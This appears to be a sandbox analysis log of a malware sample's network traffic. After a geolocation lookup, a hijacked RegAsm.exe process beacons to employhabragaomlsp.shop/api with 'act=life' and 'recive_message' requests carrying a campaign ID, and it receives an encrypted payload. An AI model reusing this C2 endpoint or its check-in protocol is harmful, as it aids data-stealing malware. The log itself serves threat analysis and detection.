                                2024-05-23 22:21:56 UTC876INData Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 37 35 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76
                                Data Ascii: { "input": "8.46.123.175", "data": { "ip": "8.46.123.175", "hostname": "static-cpe-8-46-123-175.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Lev
                                2024-05-23 22:21:56 UTC152INData Raw: 20 20 22 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 40 61 75 70 2e 6c 75 6d 65 6e 2e 63 6f 6d 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 43 65 6e 74 75 72 79 6c 69 6e 6b 20 41 62 75 73 65 20 44 65 73 6b 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 30 2f 32 34 22 2c 0a 20 20 20 20 20 20 22 70 68 6f 6e 65 22 3a 20 22 2b 31 2d 38 37 37 2d 38 38 36 2d 36 35 31 35 22 0a 20 20 20 20 7d 0a 20 20 7d 0a 7d
                                Data Ascii: "email": "abuse@aup.lumen.com", "name": "Centurylink Abuse Desk", "network": "8.46.123.0/24", "phone": "+1-877-886-6515" } }}


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.649712104.26.5.154433108C:\Users\user\Desktop\tMO4FVIc9l.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:21:56 UTC261OUTGET /demo/home.php?s=8.46.123.175 HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: application/x-www-form-urlencoded
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                Host: db-ip.com
                                2024-05-23 22:21:57 UTC658INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:21:56 GMT
                                Content-Type: application/json
                                Transfer-Encoding: chunked
                                Connection: close
                                x-iplb-request-id: A29E9AFD:7C20_93878F2E:0050_664FC184_EDB3B77:4F34
                                x-iplb-instance: 59215
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q%2Fbw%2FJDmaKiGhvFUU52TMNWmY2xSuQ78iM8tRfZoiZpO0Fc4%2FRsA5EZr%2FmvpFM9A1CXhAKeKyGw5cM66rdi91tJRpu%2FCZOwoR7tz51e8vt8U3tBUKXFOLcfmlw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8888711ed8254400-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-23 22:21:57 UTC85INData Raw: 34 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 65 72 72 6f 72 22 3a 22 6f 76 65 72 20 71 75 65 72 79 20 6c 69 6d 69 74 2c 20 70 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 22 7d 7d 0d 0a
                                Data Ascii: 4f{"status":"ok","demoInfo":{"error":"over query limit, please try again later"}}
                                2024-05-23 22:21:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.649715188.114.96.34436472C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:04 UTC270OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: application/x-www-form-urlencoded
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 8
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:04 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                Data Ascii: act=life
                                2024-05-23 22:22:04 UTC816INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:04 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=jvapbbtugt02fq4e80317niqgp; expires=Mon, 16-Sep-2024 16:08:43 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uytpTN60m0PhonO%2Fx7L3xxOiLXFAKHRPq0WM8%2BC6P4FHEiQ9F5ijVPXRwySXZS31ntozhLyCScLh97s9XQm5wUk%2FaWbjIDlBNRSaCEO3OECArt%2Fn1qPKrULasy%2BaZzjbGUAk8lDJREBLrA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8888714bca41c337-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-23 22:22:04 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                Data Ascii: 2ok
                                2024-05-23 22:22:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                3192.168.2.649716188.114.96.3443500C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:04 UTC270OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: application/x-www-form-urlencoded
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 8
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:04 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                Data Ascii: act=life
                                2024-05-23 22:22:05 UTC818INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:05 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=grr13j99ahf08btc36ekc45tuh; expires=Mon, 16-Sep-2024 16:08:44 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3RRlOIO5r9qI7yvFWHntLGhW0cccdMKQsMqul%2FH4b%2BsT3TjGBt67rkLOyTWw315pQiCzIaJ%2FLKmcmyDsS9%2F7sEAx1WAfg8hYHVI31POxLkywbB%2BPdDA944oabo1VhRH7eX%2FvmkuRNo9TzA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 888871502b521778-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-23 22:22:05 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                Data Ascii: 2ok
                                2024-05-23 22:22:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                4192.168.2.649717188.114.96.34434340C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:04 UTC270OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: application/x-www-form-urlencoded
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 8
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:04 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                Data Ascii: act=life
                                2024-05-23 22:22:05 UTC810INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:05 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=agh5mqlcru3kj58nsas0igr8lj; expires=Mon, 16-Sep-2024 16:08:44 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LTsqFZoQuLbYMANHZbECcVly7yMy8MhrJ5zeQAeZByosQNSfQTvpYQ%2Bc966bTMEsWhlSlF5WwBpKo3so2aNu8lgicG%2Bgo3XLJgLbpDKPo87I4vzTmxZ8bUKddDyFq2uQx2ct7DhbEp4l1g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 88887150caa372ad-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-23 22:22:05 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                Data Ascii: 2ok
                                2024-05-23 22:22:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                5192.168.2.649718188.114.96.34436472C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:05 UTC271OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: application/x-www-form-urlencoded
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 49
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:05 UTC49OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d 64 65 66 61 75 6c 74
                                Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--&j=default
                                2024-05-23 22:22:05 UTC810INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:05 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=ehl97rrkdcivoj4th5qanamfl3; expires=Mon, 16-Sep-2024 16:08:44 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LfWNlBmCjq2D3mrAZXnYkY4TT87M50TI3dIpC3plz%2FnhtwyPmCiwqlpT7ucG4yR4ycxG1PJxU4fR2LEOJqcAulnz91JAJ7H%2Faqc3qICkZ8T6t6vmKG08wMZsI09SCsfkIXygRnIMuOYzMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 88887153680842fe-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-23 22:22:05 UTC559INData Raw: 31 66 62 30 0d 0a 2f 64 48 56 6b 67 46 73 63 33 5a 32 72 7a 43 4b 64 44 39 54 33 70 71 73 42 4e 46 58 71 6f 75 68 78 34 79 70 56 57 66 53 38 4c 32 47 32 39 79 77 64 30 35 4a 56 6b 4b 44 4f 6f 4e 57 54 44 62 38 6f 49 78 77 6f 79 4c 50 70 36 76 4f 72 73 67 78 52 65 6a 51 32 35 79 39 70 76 63 74 5a 6e 70 55 47 39 63 53 73 46 52 6b 57 64 66 68 70 67 33 59 64 63 2f 6c 67 2f 32 73 69 79 49 43 73 4a 58 46 69 62 53 37 34 57 67 44 48 54 59 62 79 6b 54 72 47 56 34 67 74 62 54 46 61 2f 4e 37 6f 49 4b 6f 35 65 6e 54 64 31 33 79 30 76 43 59 70 62 54 66 59 42 38 59 56 46 71 6c 4f 59 4e 57 57 69 66 38 6f 49 77 6d 6a 58 58 61 36 74 4f 6d 34 64 6f 4a 52 65 69 4c 34 64 2b 34 6f 66 64 7a 44 51 63 66 47 63 46 44 31 6c 59 46 5a 65 36 71 6e 44 54 68 4b 6f 69 42 71 4c 71 47 6f
                                Data Ascii: 1fb0/dHVkgFsc3Z2rzCKdD9T3pqsBNFXqouhx4ypVWfS8L2G29ywd05JVkKDOoNWTDb8oIxwoyLPp6vOrsgxRejQ25y9pvctZnpUG9cSsFRkWdfhpg3Ydc/lg/2siyICsJXFibS74WgDHTYbykTrGV4gtbTFa/N7oIKo5enTd13y0vCYpbTfYB8YVFqlOYNWWif8oIwmjXXa6tOm4doJReiL4d+4ofdzDQcfGcFD1lYFZe6qnDThKoiBqLqGo
                                2024-05-23 22:22:05 UTC1369INData Raw: 74 69 54 38 2b 2b 79 49 77 67 66 46 52 6e 4e 51 4f 41 64 56 6a 53 75 38 38 64 72 76 6a 58 46 34 38 79 6d 37 73 77 39 44 37 2b 59 32 35 4b 2b 73 66 42 6a 54 6c 39 38 66 36 59 53 37 77 34 64 61 66 36 34 37 57 4f 6a 4d 73 54 2f 67 5a 2b 75 6f 31 77 61 2f 76 6d 64 33 64 76 63 36 51 74 6c 65 6c 51 54 77 52 4b 77 56 42 30 35 75 66 76 4e 62 62 77 32 77 4f 4c 52 70 66 7a 4e 4f 67 43 69 6c 4e 71 52 75 62 54 69 61 51 41 58 46 78 33 47 57 2b 30 52 57 58 48 79 6b 4b 55 4e 38 7a 4c 51 71 5a 76 6e 72 75 6f 36 44 72 79 59 79 4a 2f 7a 33 35 74 38 51 48 6c 2f 44 61 55 35 67 31 5a 61 50 66 79 67 6a 43 61 33 4e 4d 7a 6f 78 36 76 67 7a 7a 73 44 76 70 2f 51 6d 62 6d 33 39 32 6b 47 47 52 55 5a 78 6c 33 6f 45 31 41 31 75 76 54 50 59 2f 4e 37 6f 49 4b 6f 35 65 6e 54 64 31 33 79
                                Data Ascii: tiT8++yIwgfFRnNQOAdVjSu88drvjXF48ym7sw9D7+Y25K+sfBjTl98f6YS7w4daf647WOjMsT/gZ+uo1wa/vmd3dvc6QtlelQTwRKwVB05ufvNbbw2wOLRpfzNOgCilNqRubTiaQAXFx3GW+0RWXHykKUN8zLQqZvnruo6DryYyJ/z35t8QHl/DaU5g1ZaPfygjCa3NMzox6vgzzsDvp/Qmbm392kGGRUZxl3oE1A1uvTPY/N7oIKo5enTd13y
                                2024-05-23 22:22:05 UTC1369INData Raw: 47 39 2f 47 49 63 46 68 30 64 78 31 50 6d 47 56 59 39 75 65 72 46 61 62 73 36 79 65 54 4f 72 75 72 4c 64 30 76 59 2b 62 54 66 74 4b 2b 77 4f 30 78 52 4e 52 6e 43 51 4f 73 48 48 77 53 2f 39 73 42 68 70 58 57 67 67 74 7a 72 68 71 41 75 62 64 76 35 6e 35 69 2f 39 36 67 68 54 68 41 59 47 4d 78 64 37 68 78 56 4d 72 33 71 78 32 6d 37 4f 73 48 6f 77 4b 48 76 77 53 55 58 73 4a 37 4e 6b 37 6d 78 2f 32 34 43 55 56 70 38 70 6a 6d 6f 45 55 56 78 35 4c 71 4f 54 4c 41 68 79 2b 4f 42 6b 4f 33 46 4f 51 4b 6d 30 72 66 30 72 50 6d 59 43 42 64 35 66 33 2b 4e 56 65 52 57 42 58 50 38 39 63 39 75 74 53 66 48 35 4d 43 72 34 4d 51 79 43 72 69 53 33 35 4b 32 73 2f 74 6f 44 52 77 51 42 73 64 53 34 42 4e 63 4f 37 61 34 67 41 37 59 58 6f 6a 75 32 2b 57 32 69 58 63 30 70 35 6d 64 71
                                Data Ascii: G9/GIcFh0dx1PmGVY9uerFabs6yeTOrurLd0vY+bTftK+wO0xRNRnCQOsHHwS/9sBhpXWggtzrhqAubdv5n5i/96ghThAYGMxd7hxVMr3qx2m7OsHowKHvwSUXsJ7Nk7mx/24CUVp8pjmoEUVx5LqOTLAhy+OBkO3FOQKm0rf0rPmYCBd5f3+NVeRWBXP89c9utSfH5MCr4MQyCriS35K2s/toDRwQBsdS4BNcO7a4gA7YXoju2+W2iXc0p5mdq
                                2024-05-23 22:22:05 UTC1369INData Raw: 6d 41 52 63 52 47 63 70 5a 36 77 52 50 4d 72 6a 32 77 69 62 39 58 61 4f 43 67 36 4c 32 69 32 39 48 38 4c 66 49 6e 4b 4f 78 38 79 4e 6d 65 67 74 61 70 54 6e 78 66 6a 5a 61 2f 50 2f 43 4a 75 74 33 69 4f 6e 4e 71 65 58 4d 50 41 36 30 6c 74 2b 53 75 4c 6e 2b 61 67 49 5a 47 42 50 66 58 2b 30 65 56 7a 69 35 39 4d 4e 6c 6f 54 62 4a 71 59 33 4e 68 61 42 33 41 71 6a 53 68 39 33 7a 6b 4d 4e 55 4c 56 46 38 66 39 49 63 67 48 31 45 57 64 65 54 6a 6d 47 2f 64 5a 43 72 67 36 54 6d 7a 44 6b 42 6f 70 7a 4e 6b 62 53 33 39 6d 73 47 46 68 67 61 77 30 44 67 46 31 30 2f 73 2f 44 48 59 72 49 78 7a 4f 58 45 35 61 43 6a 58 47 37 77 6c 63 66 66 36 2f 57 77 53 77 30 4c 44 6c 62 6a 57 65 67 52 54 53 65 6e 75 4b 59 4e 72 48 75 67 67 74 72 4e 68 61 42 33 41 72 7a 53 68 39 33 7a 73 2f
                                Data Ascii: mARcRGcpZ6wRPMrj2wib9XaOCg6L2i29H8LfInKOx8yNmegtapTnxfjZa/P/CJut3iOnNqeXMPA60lt+SuLn+agIZGBPfX+0eVzi59MNloTbJqY3NhaB3AqjSh93zkMNULVF8f9IcgH1EWdeTjmG/dZCrg6TmzDkBopzNkbS39msGFhgaw0DgF10/s/DHYrIxzOXE5aCjXG7wlcff6/WwSw0LDlbjWegRTSenuKYNrHuggtrNhaB3ArzSh93zs/
                                2024-05-23 22:22:05 UTC1369INData Raw: 48 78 2f 4f 57 4f 45 56 55 54 65 39 39 73 35 6f 73 33 57 47 67 61 6a 4f 72 73 77 76 52 65 6a 51 6e 37 2b 34 6f 65 56 67 48 68 63 54 47 49 30 36 67 77 6b 54 57 64 66 68 70 67 33 59 64 63 2f 6c 67 2f 32 73 69 7a 6b 58 74 4a 50 66 6c 37 71 37 2b 32 73 63 46 68 4d 66 77 31 7a 6a 45 6c 45 34 74 2f 48 4c 61 72 49 2b 77 65 7a 48 72 2b 6a 47 64 30 76 59 2b 62 54 66 74 4b 2b 77 4f 30 78 52 4f 42 66 43 57 61 68 2b 4e 69 37 79 6b 4b 56 2f 32 31 36 6a 71 63 53 70 72 70 4e 31 52 62 65 61 31 35 47 77 73 66 74 76 41 68 41 64 45 73 68 61 37 78 6c 61 4f 4c 76 34 79 48 53 30 4f 4d 48 70 79 4b 7a 6b 7a 7a 59 4f 38 4e 79 33 39 4e 6a 33 39 33 74 4f 53 56 5a 55 2f 31 58 2b 42 6c 35 78 31 4a 50 52 4b 4e 68 64 6f 2f 43 72 7a 6f 57 4c 4d 41 6e 77 79 70 33 66 76 71 58 78 5a 68 77
                                Data Ascii: Hx/OWOEVUTe99s5os3WGgajOrswvRejQn7+4oeVgHhcTGI06gwkTWdfhpg3Ydc/lg/2sizkXtJPfl7q7+2scFhMfw1zjElE4t/HLarI+wezHr+jGd0vY+bTftK+wO0xROBfCWah+Ni7ykKV/216jqcSprpN1Rbea15GwsftvAhAdEsha7xlaOLv4yHS0OMHpyKzkzzYO8Ny39Nj393tOSVZU/1X+Bl5x1JPRKNhdo/CrzoWLMAnwyp3fvqXxZhw
                                2024-05-23 22:22:05 UTC1369INData Raw: 56 50 6b 47 56 34 2b 76 2f 76 50 62 4b 45 6e 78 4f 44 4c 6f 4f 4c 41 4f 51 4f 69 6c 4e 43 57 73 4c 54 35 5a 41 59 64 48 68 66 4b 45 71 5a 2b 4e 6c 72 38 2f 39 59 6d 36 33 65 49 79 74 53 31 34 34 74 66 62 71 2f 63 74 2f 53 71 33 35 73 49 54 68 59 59 56 4a 55 51 71 42 35 51 4f 62 62 38 79 57 75 30 4d 38 48 37 79 71 44 67 79 7a 4d 4f 76 35 54 62 6e 4c 4f 6c 39 6d 63 47 45 68 6b 5a 77 31 48 73 56 68 4e 5a 31 35 4f 4f 59 61 74 31 6b 4b 75 44 6c 2b 50 46 4c 41 71 33 67 39 58 66 32 39 7a 76 4c 57 5a 36 44 58 79 6d 4f 61 67 52 55 58 48 6b 75 6f 35 69 76 53 66 44 36 4d 69 75 34 4d 77 34 41 4c 71 53 30 4a 75 77 75 66 74 69 44 52 6b 5a 47 63 4e 59 34 52 39 61 50 62 6a 2f 6a 69 6a 62 58 71 4f 70 78 4c 32 75 6b 33 56 46 6d 37 50 79 73 37 53 74 73 41 74 6c 44 6c 70 38
                                Data Ascii: VPkGV4+v/vPbKEnxODLoOLAOQOilNCWsLT5ZAYdHhfKEqZ+Nlr8/9Ym63eIytS144tfbq/ct/Sq35sIThYYVJUQqB5QObb8yWu0M8H7yqDgyzMOv5TbnLOl9mcGEhkZw1HsVhNZ15OOYat1kKuDl+PFLAq3g9Xf29zvLWZ6DXymOagRUXHkuo5ivSfD6Miu4Mw4ALqS0JuwuftiDRkZGcNY4R9aPbj/jijbXqOpxL2uk3VFm7Pys7StsAtlDlp8
                                2024-05-23 22:22:05 UTC716INData Raw: 31 63 4d 71 72 31 33 69 62 62 58 74 65 6e 71 38 37 33 6f 31 78 75 38 4a 58 54 33 2b 76 31 73 47 55 48 46 78 4d 53 77 30 44 74 45 46 49 2b 74 66 48 4b 62 72 41 31 7a 4f 33 45 6f 4f 33 48 50 41 4b 7a 6e 64 75 57 76 62 37 2f 49 30 42 35 66 33 2b 4e 56 66 42 57 42 58 50 38 32 64 56 6c 76 7a 69 49 67 61 69 36 6f 4b 4e 63 48 4e 6a 35 74 4e 2b 30 75 37 41 37 54 46 45 59 47 73 68 53 34 68 42 5a 4e 4c 72 79 79 32 61 34 4e 73 66 74 78 61 48 68 79 7a 77 4d 73 5a 54 61 6c 62 69 78 2f 57 41 49 46 31 52 61 70 54 6d 44 56 6c 6f 70 2f 4b 43 4d 4a 70 4d 75 78 65 58 45 35 59 61 67 4b 45 76 59 2b 63 62 33 32 4e 79 77 5a 41 4a 52 54 46 61 4e 57 65 51 53 57 6a 47 78 2b 38 5a 6a 74 7a 2f 4e 36 63 75 33 35 73 73 77 46 36 4b 53 31 70 71 2f 74 50 42 6e 43 42 67 53 46 38 6b 53 70
                                Data Ascii: 1cMqr13ibbXtenq873o1xu8JXT3+v1sGUHFxMSw0DtEFI+tfHKbrA1zO3EoO3HPAKznduWvb7/I0B5f3+NVfBWBXP82dVlvziIgai6oKNcHNj5tN+0u7A7TFEYGshS4hBZNLryy2a4NsftxaHhyzwMsZTalbix/WAIF1RapTmDVlop/KCMJpMuxeXE5YagKEvY+cb32NywZAJRTFaNWeQSWjGx+8Zjtz/N6cu35sswF6KS1pq/tPBnCBgSF8kSp
                                2024-05-23 22:22:05 UTC1369INData Raw: 31 32 37 31 0d 0a 62 67 41 52 56 46 71 6c 4f 59 4e 57 57 69 6e 38 6f 49 77 6d 6b 43 4c 65 34 39 6a 6c 68 71 41 6f 53 39 6a 35 78 76 66 59 33 4c 42 6b 41 6c 46 4d 56 6f 31 66 37 78 68 56 4e 37 4c 2b 33 47 71 38 4d 38 6a 6f 79 61 6a 69 77 44 41 4c 75 35 54 61 6b 72 4f 78 39 6d 63 4b 46 52 6f 58 6a 52 79 41 66 54 5a 78 75 2b 43 4f 50 76 46 31 37 38 54 79 35 38 33 63 49 51 2b 33 6e 73 6d 55 73 72 54 6d 62 68 35 52 66 48 2f 53 48 49 42 39 52 46 6e 58 6b 34 35 68 76 33 57 51 71 34 4f 75 34 4d 34 32 43 62 71 56 30 59 32 79 76 66 78 69 43 52 59 66 42 73 5a 41 34 78 35 65 50 37 54 78 7a 6d 69 7a 4e 4d 58 70 67 2b 75 47 6f 46 78 46 74 34 71 66 78 2f 48 33 31 55 41 5a 42 78 35 57 37 6b 58 2b 48 46 6f 39 71 76 50 50 5a 61 55 34 32 4b 6d 72 7a 76 47 46 58 32 36 70 2b
                                Data Ascii: 1271bgARVFqlOYNWWin8oIwmkCLe49jlhqAoS9j5xvfY3LBkAlFMVo1f7xhVN7L+3Gq8M8joyajiwDALu5TakrOx9mcKFRoXjRyAfTZxu+COPvF178Ty583cIQ+3nsmUsrTmbh5RfH/SHIB9RFnXk45hv3WQq4Ou4M42CbqV0Y2yvfxiCRYfBsZA4x5eP7TxzmizNMXpg+uGoFxFt4qfx/H31UAZBx5W7kX+HFo9qvPPZaU42KmrzvGFX26p+
                                2024-05-23 22:22:05 UTC1369INData Raw: 34 2b 32 4a 4f 58 33 78 2f 70 68 4c 75 56 67 56 7a 37 4c 61 6d 44 64 68 31 7a 50 69 44 2f 61 79 62 5a 56 37 6c 77 59 6a 50 34 64 2b 62 66 45 42 35 66 77 32 6c 4f 59 4e 57 53 33 48 6b 75 70 77 6f 32 31 36 6a 71 64 48 6c 74 6f 6c 33 51 72 36 66 33 70 79 39 74 4f 4a 78 43 42 49 43 46 34 70 73 31 6a 64 51 4f 72 44 31 77 57 32 4e 43 2b 6e 6b 79 4b 6e 6a 78 44 77 37 6a 6f 66 63 6b 62 32 77 35 6e 4a 4f 58 33 78 2f 70 68 4c 6e 56 67 56 7a 68 62 69 47 4a 6f 78 37 6f 49 4b 6f 35 66 61 4c 62 30 66 77 70 39 79 52 76 62 44 6d 63 6b 4d 77 47 52 2f 42 58 2b 63 64 48 58 2f 55 6b 36 55 6d 74 58 57 51 71 35 50 72 68 71 42 63 52 62 53 44 6e 38 66 78 35 36 49 34 57 30 4a 44 52 4a 38 36 67 77 6b 54 57 64 66 68 70 67 33 59 64 64 36 70 6d 2b 65 38 68 56 39 75 32 39 4c 4e 33 2b
                                Data Ascii: 4+2JOX3x/phLuVgVz7LamDdh1zPiD/aybZV7lwYjP4d+bfEB5fw2lOYNWS3Hkupwo216jqdHltol3Qr6f3py9tOJxCBICF4ps1jdQOrD1wW2NC+nkyKnjxDw7jofckb2w5nJOX3x/phLnVgVzhbiGJox7oIKo5faLb0fwp9yRvbDmckMwGR/BX+cdHX/Uk6UmtXWQq5PrhqBcRbSDn8fx56I4W0JDRJ86gwkTWdfhpg3Ydd6pm+e8hV9u29LN3+


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                6192.168.2.649719188.114.96.3443500C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:05 UTC271OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: application/x-www-form-urlencoded
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 49
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:05 UTC49OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d 64 65 66 61 75 6c 74
                                Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--&j=default
                                2024-05-23 22:22:06 UTC820INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:06 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=bqvtupqi0opkfha9jomt3r4oht; expires=Mon, 16-Sep-2024 16:08:45 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
